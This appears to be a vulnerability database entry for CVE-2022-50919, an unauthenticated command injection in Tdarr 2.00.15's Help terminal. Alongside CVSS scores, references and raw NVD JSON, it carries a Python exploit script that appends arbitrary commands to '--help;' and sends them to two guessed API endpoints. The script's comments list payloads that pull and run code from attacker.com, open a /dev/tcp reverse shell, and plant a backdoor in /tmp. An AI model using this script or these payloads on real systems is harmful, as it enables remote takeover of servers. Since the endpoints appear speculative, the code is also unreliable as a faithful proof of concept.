CVE-2022-50919

Description

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:* - VULNERABLE

Tdarr 2.00.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2022-50919 - Tdarr Unauthenticated RCE PoC
Target: Tdarr 2.00.15 Help Terminal
Severity: Critical (CVSS 9.8)
Usage: python3 cve-2022-50919.py <target_ip> <target_port>
"""

import requests
import sys
import argparse

def exploit(target_ip, target_port=8265):
    """
    Exploit CVE-2022-50919 by injecting commands through Help terminal
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Prepare malicious payload - chain commands using semicolon
    # This payload executes a reverse shell to attacker controlled server
    cmd = input("Enter command to execute: ")
    payload = f"--help; {cmd}"
    
    # Alternative payload examples:
    # payload = "--help; curl http://attacker.com/shell.py | python3"
    # payload = "--help; bash -i >& /dev/tcp/attacker_ip/port 0>&1"
    # payload = "--help; wget http://attacker.com/backdoor -O /tmp/back && chmod +x /tmp/back && /tmp/back"
    
    try:
        # Method 1: Direct API request
        params = {'command': payload}
        response = requests.get(f"{base_url}/api/v1/help", params=params, timeout=10)
        print(f"[*] Request sent to {base_url}/api/v1/help")
        print(f"[*] Payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        
        # Method 2: Alternative endpoint
        headers = {'Content-Type': 'application/json'}
        data = {'cmd': payload}
        response2 = requests.post(f"{base_url}/api/v1/terminal", json=data, headers=headers, timeout=10)
        print(f"[*] Alternative endpoint response: {response2.text[:500]}")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False
    
    return True

def main():
    parser = argparse.ArgumentParser(description='CVE-2022-50919 Tdarr RCE Exploit')
    parser.add_argument('target_ip', help='Target Tdarr server IP address')
    parser.add_argument('target_port', type=int, default=8265, help='Target port (default: 8265)')
    args = parser.parse_args()
    
    print("="*60)
    print("CVE-2022-50919 - Tdarr Unauthenticated RCE")
    print("="*60)
    
    exploit(args.target_ip, args.target_port)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50919
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50919
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50919/
[4] VulDB https://vuldb.com/cve/CVE-2022-50919
[5] https://tdarr.io
[6] https://www.exploit-db.com/exploits/50822
[7] https://www.vulncheck.com/advisories/tdarr-command-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50919", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.597", "lastModified": "2026-01-29T18:54:53.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication."}, {"lang": "es", "value": "Tdarr 2.00.15 contiene una vulnerabilidad de ejecución remota de código no autenticada en su terminal de Ayuda que permite a los atacantes inyectar y encadenar comandos arbitrarios. Los atacantes pueden explotar la falta de filtrado de entrada encadenando comandos como '--help; curl .py | python' para ejecutar código remoto sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:*", "matchCriteriaId": "2238BC79-2A44-46AD-B1F9-C1F40FB30357"}]}]}], "references": [{"url": "https://tdarr.io", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50822", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/tdarr-command-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}